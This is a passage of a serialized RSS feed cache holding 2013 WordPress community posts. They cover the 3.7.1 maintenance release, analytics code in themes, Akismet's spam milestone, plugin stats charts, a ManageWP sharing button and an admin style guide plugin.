target=\"_blank\">Mark Jaquith</a>, sums it up nicely:</p>\n<blockquote><p>Just a few fixes<br />\nYour new update attitude:<br />\nZero clicks given</p></blockquote>\n<p><span id=\"more-10664\"></span></p>\n<p>WordPress 3.7 is rapidly approaching <a href=\"http://wordpress.org/download/counter/\" target=\"_blank\">two million downloads</a>. That&#8217;s a huge number of site admins who don&#8217;t have to worry about logging in to perform updates. WordPress core developer Andrew Nacin said that maintenance and security releases are likely to be a more frequent occurrence now that they don&#8217;t have to worry about update fatigue. If you&#8217;re wondering how long your site will take to update to WordPress 3.7.1, Nacin estimated 24 seconds. He&#8217;s probably done this a thousand times while testing:</p>\n<blockquote><p>Installs take about 24 seconds to update on average, but that includes downloading and unzipping the package. A core update should put your site into maintenance mode for only a few seconds.</p></blockquote>\n<p>This release includes 10 fixes for small bugs in 3.7. Check out the full <a href=\"http://core.trac.wordpress.org/log/branches/3.7?stop_rev=25914&rev=25986\" target=\"_blank\">changelog</a> to get the details.</p>\n<p>You can update your site immediately or wait until the core team starts rolling out the automatic background updates. I suggest you go crack yourself a cold one and let WordPress do the work for you.</p>\n<img src=\"http://feeds.feedburner.com/~r/WordpressTavern/~4/Mr-_9NV-UoE\" height=\"1\" width=\"1\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 29 Oct 2013 22:09:39 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:28;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"WPTavern: Why You Should Never Add Analytics Code to Your WordPress Theme\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"http://www.wptavern.com/?p=10602\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:125:\"http://feedproxy.google.com/~r/WordpressTavern/~3/Cgbk-X7PiGg/why-you-should-never-add-analytics-code-to-your-wordpress-theme\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4181:\"<p><a href=\"http://i1.wp.com/www.wptavern.com/wp-content/uploads/2013/10/ga.jpg\" rel=\"thumbnail\"><img src=\"http://i2.wp.com/www.wptavern.com/wp-content/uploads/2013/10/ga.jpg?resize=300%2C280\" alt=\"ga\" class=\"alignright size-medium wp-image-10654\" /></a>This is a simple thing but it bears mentioning. Many major WordPress theme providers offer the ability to easily add Google Analytics or other tracking code via the theme&#8217;s options panel. </p>\n<p>The idea stems from wanting to market a theme with everything needed to create the website that you see in the demo. Theme developers have been successful at selling themselves as one stop shops. To that end, they often pack WordPress themes full of code that is better suited to the realm of plugins.</p>\n<p>One common example is a theme option to add tracking code. It&#8217;s likely one of the last options listed in your theme&#8217;s dashboard panel. It&#8217;s a really easy place to add Google Analytics code, but please resist the temptation to paste your code in here.<span id=\"more-10602\"></span></p>\n<h3>Analytics Code is Not a Theme Feature</h3>\n<p>Site analytics are not a theme feature and simply do not belong in your theme. Analytics has nothing to do with your website&#8217;s design. Even if Google tells you to add this to the header of your site, do not directly edit your theme.</p>\n<p>The reason for this is that WordPress themes were made to be easily swapped out.  More than likely you&#8217;re not going to use the same theme forever. But if your analytics code is in your theme options, then you&#8217;ll lose it when you change themes. By the time you realize it, you may already have large gaps in your analytics.</p>\n<p>Do yourself a favor. Instead of adding the code to your theme every time you change themes, just drop it in a plugin. There are plenty available on <a href=\"http://wordpress.org/plugins/search.php?q=google+analytics\" target=\"_blank\">wordpress.org</a>. You&#8217;ll only have to add it once and it will be safe when you change the design of your website.</p>\n<h3>Theme Developers: Stop Tying Data to Themes</h3>\n<p><div id=\"attachment_10650\" class=\"wp-caption alignright\"><a href=\"http://i0.wp.com/www.wptavern.com/wp-content/uploads/2013/10/medium_6200837672.jpg\" rel=\"thumbnail\"><img src=\"http://i0.wp.com/www.wptavern.com/wp-content/uploads/2013/10/medium_6200837672.jpg?resize=300%2C300\" alt=\"Portability - I has it\" class=\"size-medium wp-image-10650\" /></a><p class=\"wp-caption-text\">Portability &#8211; I has it</p></div>This discussion boils down to data portability, a topic of recent conversation on Justin Tadlock&#8217;s blog: <a href=\"http://justintadlock.com/archives/2013/09/14/why-custom-post-types-belong-in-plugins\" target=\"_blank\">Why custom post types belong in plugins</a>. If you&#8217;re a theme developer, please do not tie any form of data or content to the themes you create.  This includes analytics, shortcodes, custom post types, booking and event management, testimonials, fundraising functionality, portfolios, etc. The list could go on and on. </p>\n<p>If a user cannot quickly pack up his data and go after using your theme, then your product has become a dead weight. In a perfect world, WordPress consumers will start looking at themes with this question in mind: <strong>&#8220;If I wanted to stop using this theme tomorrow, could all my data go with me?&#8221;</strong>  If you&#8217;re selling a product that doesn&#8217;t pass that test, then you might want to make a few changes for the sake of data portability. </p>\n<p>Better options would be to include functionality plugins with the purchase of the theme or recommend a high quality plugin to accompany it. Keeping those functions separate from the theme itself will help users to take their data with them when they change themes. As a bonus, it&#8217;s also easier to troubleshoot when providing support. Let&#8217;s just keep themes clean. We&#8217;ve all been guilty of hindering data portability in the past, but now is good time to start building WordPress products differently.</p>\n<img src=\"http://feeds.feedburner.com/~r/WordpressTavern/~4/Cgbk-X7PiGg\" height=\"1\" width=\"1\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 29 Oct 2013 21:30:21 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:29;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:37:\"Matt: New Virgin America Safety Video\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=43146\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"http://ma.tt/2013/10/new-virgin-america-safety-video/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:288:\"<p><span class=\"embed-youtube\"></span></p>\n<p>Virgin America is giving Delta a run for their money with this amazing safety video &#8212; who has ever said that before? &#8212; directed by Jon Chu, who also did two of the Step Up movies. (Which sound cheesy but are actually awesome.)</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 29 Oct 2013 21:27:02 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Matt Mullenweg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:30;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:45:\"Dev Blog: WordPress 3.7.1 Maintenance Release\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=2745\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"http://wordpress.org/news/2013/10/wordpress-3-7-1/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1589:\"<p>WordPress 3.7.1 is now available! This maintenance release addresses 11 bugs in WordPress 3.7, including:</p>\n<ul>\n<li>Images with captions no longer appear broken in the visual editor.</li>\n<li>Allow some sites running on old or poorly configured servers to continue to check for updates from WordPress.org.</li>\n<li>Avoid fatal errors with certain plugins that were incorrectly calling some WordPress functions too early.</li>\n<li>Fix hierarchical sorting in get_pages(), exclusions in wp_list_categories(), and in_category() when called with empty values.</li>\n<li>Fix a warning that may occur in certain setups while performing a search, and a few other notices.</li>\n</ul>\n<p>For a full list of changes, consult the <a href=\"http://core.trac.wordpress.org/query?milestone=3.7.1\">list of tickets</a> and <a href=\"http://core.trac.wordpress.org/log/branches/3.7?stop_rev=25914&rev=25986\">the changelog</a>.</p>\n<p>If you are one of the <a href=\"http://wordpress.org/download/counter/\">nearly two million</a> already running WordPress 3.7, we will start rolling out the all-new <a href=\"http://wordpress.org/news/2013/10/basie/\">automatic background updates</a> for WordPress 3.7.1 in the next few hours. For sites <a href=\"http://wordpress.org/plugins/background-update-tester/\">that support them</a>, of course.</p>\n<p><a href=\"http://wordpress.org/download/\">Download WordPress 3.7.1</a> or venture over to <strong>Dashboard → Updates</strong> and simply click &#8220;Update Now.&#8221;</p>\n<p><em>Just a few fixes<br />\nYour new update attitude:<br />\nZero clicks given</em></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 29 Oct 2013 21:04:59 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Andrew Nacin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:31;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"WPTavern: Akismet Celebrates Huge Spam Blocking Milestone\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"http://www.wptavern.com/?p=10641\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:109:\"http://feedproxy.google.com/~r/WordpressTavern/~3/wZZvO0gdnRM/akismet-celebrates-huge-spam-blocking-milestone\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3397:\"<p><a href=\"http://i1.wp.com/www.wptavern.com/wp-content/uploads/2013/10/AkismetSpamCountOverOneHundredBillion.jpg\" rel=\"thumbnail\"><img src=\"http://i2.wp.com/www.wptavern.com/wp-content/uploads/2013/10/AkismetSpamCountOverOneHundredBillion.jpg?resize=500%2C58\" alt=\"Akismet Spam Counter\" class=\"aligncenter size-full wp-image-10642\" /></a></p>\n<p><a href=\"http://akismet.com/\" title=\"http://akismet.com/\">Akismet</a> is celebrating a huge milestone today. According to its spam counter, it has now blocked over 100,000,000,000 spam messages. Not all of that spam has originated from WordPress powered websites. Thanks to a number of <a href=\"http://akismet.com/development/\" title=\"http://akismet.com/development/\">libraries and an API</a>, Akismet can be used on different content management systems as well as services. <span id=\"more-10641\"></span></p>\n<h3>Installing Akismet Helpers</h3>\n<p>While Akismet has saved me a ton of time, ever since I added two plugins to this website to go in front of Akismet, it&#8217;s been much more effective. I&#8217;ve installed <a href=\"http://wordpress.org/plugins/cookies-for-comments\" title=\"http://wordpress.org/plugins/cookies-for-comments\">Cookies for comments</a> and <a href=\"http://wordpress.org/plugins/simple-trackback-validation/\" title=\"http://wordpress.org/plugins/simple-trackback-validation/\">Simple Trackback Validation</a>. The results speak for themselves. But don&#8217;t take my word for it. <a href=\"http://justintadlock.com/archives/2013/09/10/cookies-for-comments\" title=\"http://justintadlock.com/archives/2013/09/10/cookies-for-comments\">Justin Tadlock wrote about his experience</a> using these two plugins and he considered Cookies for comments one of his top 5. Another plugin worthy of trying is<a href=\"http://wordpress.org/plugins/wp-hashcash/\" title=\"http://wordpress.org/plugins/wp-hashcash/\"> WP-Hashcash</a>. While you may notice the two-year update notice on the WP-Hashcash and Simple Trackback Validation plugin pages, I can assure you that both work with WordPress 3.7. </p>\n<h3>Share How Much Spam Akismet Has Blocked</h3>\n<p>If you use the Jetpack plugin by Automattic, you&#8217;ll be able to use the Akismet widget. Browse to <strong>Appearance &#8211; Widgets</strong> and locate the Akismet Widget under the available widgets area. There are no options since the only thing it does is show people visiting your site how much spam has been blocked. While green is the color of Akismet, it doesn&#8217;t look great on every website. Also, since there is no padding underneath the spam count, it gives the appearance that the widget is broken. </p>\n<p><a href=\"http://i0.wp.com/www.wptavern.com/wp-content/uploads/2013/10/SpamBlockedOnWPTavern.jpg\" rel=\"thumbnail\"><img src=\"http://i2.wp.com/www.wptavern.com/wp-content/uploads/2013/10/SpamBlockedOnWPTavern.jpg?resize=337%2C124\" alt=\"Spam Blocked On WPTavern\" class=\"aligncenter size-full wp-image-10645\" /></a></p>\n<p>Don&#8217;t mind the number because it&#8217;s wrong. Since the launch of WPTavern, the counter has been reset a few times. With WordPress powering 20% of the web and multiple services able to tie into Akismet, it shouldn&#8217;t take nearly as long to reach 200,000,000,000. I just hope this site doesn&#8217;t take the brunt of that number!</p>\n<img src=\"http://feeds.feedburner.com/~r/WordpressTavern/~4/wZZvO0gdnRM\" height=\"1\" width=\"1\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 29 Oct 2013 21:00:46 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"Jeffro\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:32;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"WPTavern: Why The WordPress Plugin Version Pie Chart Disappeared\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"http://www.wptavern.com/?p=10634\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:116:\"http://feedproxy.google.com/~r/WordpressTavern/~3/LiKDt2xGB94/why-the-wordpress-plugin-version-pie-chart-disappeared\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1605:\"<p><a href=\"http://i2.wp.com/www.wptavern.com/wp-content/uploads/2013/10/PluginVersionsChart.jpg\" rel=\"thumbnail\"><img src=\"http://i2.wp.com/www.wptavern.com/wp-content/uploads/2013/10/PluginVersionsChart.jpg?resize=150%2C150\" alt=\"Plugin Version Chart\" class=\"alignright size-thumbnail wp-image-10635\" /></a>About three years ago, <a href=\"http://make.wordpress.org/core/2010/10/22/new-and-improved-this-morning-we-have-a/\" title=\"http://make.wordpress.org/core/2010/10/22/new-and-improved-this-morning-we-have-a/\">WordPress introduced pie charts and a stats API</a> to the plugin repository. These stats gave plugin authors a chance to see which versions of their plugin were activated while also giving a glimpse into how many actual users the plugin had. The API provided a method to getting access to the data. Unfortunately, the API along with the Pie charts have been temporarily removed. <span id=\"more-10634\"></span></p>\n<p>According to <a href=\"http://meta.trac.wordpress.org/ticket/107\" title=\"http://meta.trac.wordpress.org/ticket/107\">ticket #107</a> which states that the pie charts were reporting erroneous data, Otto responded <em>&#8220;until we can sort out the stats gathering system, this was no better than random numbers</em>&#8220;. I sent an email to the WordPress.org team to see if any progress had been made on this problem. Their response is that they have not looked into it yet. It will be worked on at some point, but it&#8217;s not high on the priority list at the moment.</p>\n<img src=\"http://feeds.feedburner.com/~r/WordpressTavern/~4/LiKDt2xGB94\" height=\"1\" width=\"1\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 29 Oct 2013 20:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"Jeffro\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:33;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"WPTavern: How To Add A ManageWP Button To Jetpack Sharing\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"http://www.wptavern.com/?p=10611\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:109:\"http://feedproxy.google.com/~r/WordpressTavern/~3/kG3zYYYBhm4/how-to-add-a-managewp-button-to-jetpack-sharing\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4801:\"<p><a href=\"http://i1.wp.com/www.wptavern.com/wp-content/uploads/2013/10/ManageWPdotorgLogo.jpg\" rel=\"thumbnail\"><img class=\"alignright size-full wp-image-10615\" alt=\"Manage WordPress.org Logo\" src=\"http://i2.wp.com/www.wptavern.com/wp-content/uploads/2013/10/ManageWPdotorgLogo.jpg?resize=226%2C68\" /></a>ManageWP.org has been live since October 14th and has already <a title=\"https://twitter.com/vprelovac/status/394821188284715008\" href=\"https://twitter.com/vprelovac/status/394821188284715008\">accumulated over 1,000 registered users</a>. The site has also been in the top 5 of traffic referrals to WPTavern.com, thanks in large part to the unsolicited submission of articles and upvotes. We extend a huge thank you to all who have shared and voted on WPTavern articles on the site. Read on to learn how you can easily tap into this traffic source.<span id=\"more-10611\"></span></p>\n<p><a href=\"http://i0.wp.com/www.wptavern.com/wp-content/uploads/2013/10/SharingModuleInJetpack.jpg\" rel=\"thumbnail\"><img class=\"alignright size-thumbnail wp-image-10618\" alt=\"Jetpack Sharing module\" src=\"http://i1.wp.com/www.wptavern.com/wp-content/uploads/2013/10/SharingModuleInJetpack.jpg?resize=150%2C150\" /></a>While ManageWP.org <a title=\"http://managewp.org/resources\" href=\"http://managewp.org/resources\">offers two different button styles</a> you can display within the content, I prefer not to have anything within the content block that serves as a distraction. That&#8217;s why I use the Sharing module within Jetpack. Using this module, I can add or subtract services for sharing content. I can also configure where they are displayed. ManageWP is not one of the supported services by default but you can easily add the service by following these instructions.</p>\n<p>Browse to the sharing module in Jetpack and click the <em>add new service</em> link under available services.</p>\n<ul>\n<li>For service name enter <strong>ManageWP.org</strong></li>\n<li>Sharing URL: <strong>http://managewp.org/share/form?url=%post_url%</strong></li>\n<li>Icon URL: <strong>http://managewp.org/icon.png</strong></li>\n</ul>\n<p>Then click on the create share button. This is where it becomes confusing. After clicking the create share button, you&#8217;ll see a spinning circle indicating that something is happening. When it stops, the add new service pop-up stays on the screen. This gives the appearance that it is broken or something is hanging, preventing the button from being created. In my experience, I closed the pop-up window and when I tried to add the new service again, the fields were filled with the data I supplied earlier but the create share button was stuck in the pressed position. However, when I refreshed the sharing button admin page, the ManageWP button showed up. I hope you have a smoother experience when creating the button.</p>\n<p><a href=\"http://i0.wp.com/www.wptavern.com/wp-content/uploads/2013/10/ManageWPAddingANewService.jpg\" rel=\"thumbnail\"><img class=\"aligncenter size-large wp-image-10621\" alt=\"Adding New Service In Jetpack\" src=\"http://i1.wp.com/www.wptavern.com/wp-content/uploads/2013/10/ManageWPAddingANewService.jpg?resize=500%2C347\" /></a></p>\n<p>Once the button is created, just drag it to the enabled services section and arrange it to your liking. When a visitor clicks on the button and that article has not yet been submitted to the site, that visitor will be asked to log-in if they don&#8217;t have an account or are logged out. Next, the user will be presented with a screen to share the article. If the article has already been submitted, they will be taken to the article on ManageWP.org where they can upvote it. A little known feature with this button is that the submitter also has the ability to supply an editorial comment which is viewed when visitors hover over the article title on ManageWP.org.</p>\n<h3>Why Adding The Button Is Important</h3>\n<p>Adding a ManageWP button to your site makes it easy for visitors to share and vote articles. It also helps them generate traffic, which helps other articles submitted on the site. I&#8217;ve been using ManageWP.org since its launch and have found myself browsing around discovering different articles and providing a number of upvotes. The one thing I&#8217;ve discovered is that an article with a high number of upvotes on the front page does not mean it&#8217;s the freshest article. I&#8217;ve seen a few articles published months ago that are showing up on the front page with over 20 upvotes. So keep that in mind when browsing the site.</p>\n<p>I&#8217;m interested in hearing from other WordPress content centric website owners. Has your traffic levels been any higher since the launch of ManageWP.org?</p>\n<img src=\"http://feeds.feedburner.com/~r/WordpressTavern/~4/kG3zYYYBhm4\" height=\"1\" width=\"1\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 29 Oct 2013 18:30:58 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"Jeffro\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:34;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"WPTavern: WordPress Style Guide: A Reference For Admin UI Components\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"http://www.wptavern.com/?p=10604\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:119:\"http://feedproxy.google.com/~r/WordpressTavern/~3/so0jFriSR-M/wordpress-style-guide-a-reference-for-admin-ui-components\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2670:\"<p><a href=\"http://i1.wp.com/www.wptavern.com/wp-content/uploads/2013/10/style-guide.jpg\" rel=\"thumbnail\"><img src=\"http://i0.wp.com/www.wptavern.com/wp-content/uploads/2013/10/style-guide.jpg?resize=300%2C249\" alt=\"style-guide\" class=\"alignright size-medium wp-image-10613\" /></a>WordPress is getting its own style guide. <a href=\"https://twitter.com/helenhousandi\" target=\"_blank\">Helen Hou-Sandí</a> is working on a new plugin called <a href=\"https://github.com/helenhousandi/wp-style-guide\" title=\"WordPress Style Guide\" target=\"_blank\">WordPress Style Guide</a> to serve as a reference for building WordPress admin UI components. This is very much a work in progress and its purpose will evolve, as Helen notes on the plugin&#8217;s github page: &#8220;This plugin is not planned to be distributed through the WordPress.org repository, as its anticipated final form will take over a site completely.&#8221; The end result will be a guide similar to what you see with front end development frameworks such as Twitter Bootstrap or Zurb Foundation.<span id=\"more-10604\"></span></p>\n<p>So far the plugin includes three sections: </p>\n<ul>\n<li>jQuery UI Components</li>\n<li>Forms</li>\n<li>Helper Classes</li>\n</ul>\n<p>These appear in the form of HTML pages within the admin and contain a few rough style examples:</p>\n<p><a href=\"http://i2.wp.com/www.wptavern.com/wp-content/uploads/2013/10/color-helper-classes.jpg\" rel=\"thumbnail\"><img src=\"http://i2.wp.com/www.wptavern.com/wp-content/uploads/2013/10/color-helper-classes.jpg?resize=560%2C358\" alt=\"color-helper-classes\" class=\"aligncenter size-full wp-image-10616\" /></a></p>\n<p>This style guide has the potential to greatly improve the way plugin and theme developers create UI components that fit 